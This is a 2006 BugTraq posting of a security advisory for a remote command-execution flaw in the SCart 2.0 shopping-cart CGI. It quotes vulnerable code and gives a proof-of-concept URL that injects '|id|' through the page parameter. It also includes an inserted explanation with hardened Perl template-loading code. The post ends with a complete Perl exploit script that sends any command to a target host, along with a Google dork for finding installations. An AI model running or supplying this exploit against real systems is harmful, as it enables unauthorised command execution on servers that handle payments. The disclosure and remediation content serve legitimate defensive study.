BugTraq
[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution Jun 03 2006 08:01AM
eufrato gmail com
[ ECHO .OR.ID ASCII-art banner ]

ECHO_ADV_32$2006

---------------------------------------------------------------------------

[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution

---------------------------------------------------------------------------

Author : M.Hasran Addahroni a.k.a K-159

Date : June 3rd, 2006

Location : Indonesia, Bali

Web : http://advisories.echo.or.id/adv/adv32-K-159-2006.txt

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

---------------------------------------------------------------------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SCart

Application : SCart

version : 2.0

URL : http://www.scartserver.com

Description :

SCart is a free online shopping-cart and store service with e-commerce and real-time credit card and check payment processing.

---------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~~~~

In scart.cgi the source code looks like this:

-----------------------scart.cgi-----------------------------
...
require 'scart.pl';
require '/home/scart/cgi-bin/2.0/scartserver.cgi';
...
--------------------------------------------------------------

then in scartserver.cgi, in the cgi-bin folder, the code looks like this:

---------------scartserver.cgi--------------------------------
...
$HTML{TAB2} = "$baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt";
$HTML{TAB3} = "$baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.txt";
$HTML{BUTTONBAR} = $buttonbar;
$HTML{VIEWCART} = "$baseurl$cgiurl?action=viewcart";
$HTML{CHECKOUT} = "$secureurl$cgiurl?action=checkout";
$HTML{TRACK} = "$baseurl$cgiurl?action=show_track";
$HTML{HELP} = "$baseurl$cgiurl/?action=show_page&base=base.html&page=help.txt";
...
------------------------------------------------------------------

The variables $baseurl and $cgiurl are not properly sanitized. This can be used to execute arbitrary commands.

Proof Of Concept:

~~~~~~~~~~~~~~~~~

http://www.scartserver.com/2.0/[client_user_name]/scart.cgi/?action=show_page&base=base2.html&page=|id|
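The proof of concept above injects through the page parameter with the command wrapped in pipe characters, which is exactly the shape that turns Perl's two-argument open() into a pipe open (open(FH, "|id|") runs id instead of reading a file). The advisory does not show SCart's open() call itself, so treating that as the sink is an assumption here. The following is an added example, not SCart's code and not the advisory author's, of how a show_page handler can load a template without that risk: an allowlist check on the parameter, then the three-argument open() with an explicit read mode against a fixed directory. $TEMPLATE_DIR, the file names and the .txt/.html suffix rule are assumptions for the demo.

```perl
#!/usr/bin/perl
# Added example (not SCart's code): hardened template loading for a
# "page" parameter.  Assumed layout: templates live in one directory and
# are named like "browse.txt" or "help.html".
use strict;
use warnings;
use File::Spec;

my $TEMPLATE_DIR = '/home/scart/templates';   # assumed location

# Return the validated file name, or undef if the value is unacceptable.
# Only a plain name is allowed: no slashes, no pipes, no NUL bytes,
# no leading dot, so "../x", "|id|" and "browse.txt|id|" are all rejected.
sub validate_page_name {
    my ($page) = @_;
    return undef unless defined $page;
    return undef unless $page =~ /\A[A-Za-z0-9_-]{1,64}\.(?:txt|html)\z/;
    return $page;
}

# Read a template safely.  Dies on a rejected name so the caller can
# answer with an HTTP error instead of interpolating the raw input.
sub read_template {
    my ($page) = @_;
    my $name = validate_page_name($page)
        or die "rejected page parameter\n";
    my $path = File::Spec->catfile($TEMPLATE_DIR, $name);
    # Three-argument open: "<" is the mode, so the file name can never be
    # interpreted as a pipe or as a mode prefix.  The allowlist above is
    # still needed; three-arg open alone does not stop "../" traversal.
    open(my $fh, '<', $path) or die "cannot read $path: $!\n";
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Self-check with constructed inputs, including the advisory's "|id|" form.
for my $input ('browse.txt', 'specials.txt', 'help.html', '|id|',
               'browse.txt|id|', '../../../etc/passwd', "browse.txt\0", '') {
    my $v = validate_page_name($input);
    printf "%-25s => %s\n", "'" . ($input =~ s/\0/\\0/r) . "'",
        defined $v ? "accepted ($v)" : 'rejected';
}
```

In the real handler the call would be read_template(param('page')) inside an eval, returning a 400 response when it dies. Running the self-check prints accepted for the three plain names and rejected for every other input, which is the behaviour a reviewer should expect before any user-supplied value reaches open().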

Solution:

~~~~~~~~~

No solution yet.

Notification:

~~~~~~~~~~~~

Vendor was contacted but there was no response.

---------------------------------------------------------------------------

Shoutz:

~~~~~~~

~ ping - my dearest wife, for all the luv the tears n the breath

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw

~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit

~ newbie_hacker (at) yahoogroups (dot) com

~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:

~~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com

Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:

~~~~~~~~~~~~

#!/usr/bin/perl
##
# SCart 2.0 Remote Code Execution Exploit
# Bugs Found & code By K-159
#
## based on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#
# echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl <target> </path/> "cmd"
#
# Google Dork : site:scartserver.com
#
# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use strict;
use warnings;
use LWP::Simple;

sub Usage {
    print STDERR "\n ========================================================= \r\n";
    print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n";
    print STDERR " Bugs Found by K-159 \r\n";
    print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
    print STDERR " Usage: $0 <www.target.com> </path/> \"cmd\" \r\n";
    print STDERR "============================================================= \r\n";
    exit;
}

Usage() if @ARGV < 3;

# Target host, path to scart.cgi and the command to run (see usage above).
my ($host, $path, $command) = @ARGV;

print "\n[+] Connecting to $host\n";

# Build the request from the advisory's proof of concept: the command is
# placed in the "page" parameter between pipe characters.
my $url = "http://$host$path/scart.cgi?action=show_page&base=base2.html&page=browse.txt|$command|";
my $result = get($url);

if (defined $result) {
    print $result;
}
else {
    print "Exploit Failed.\n";
}
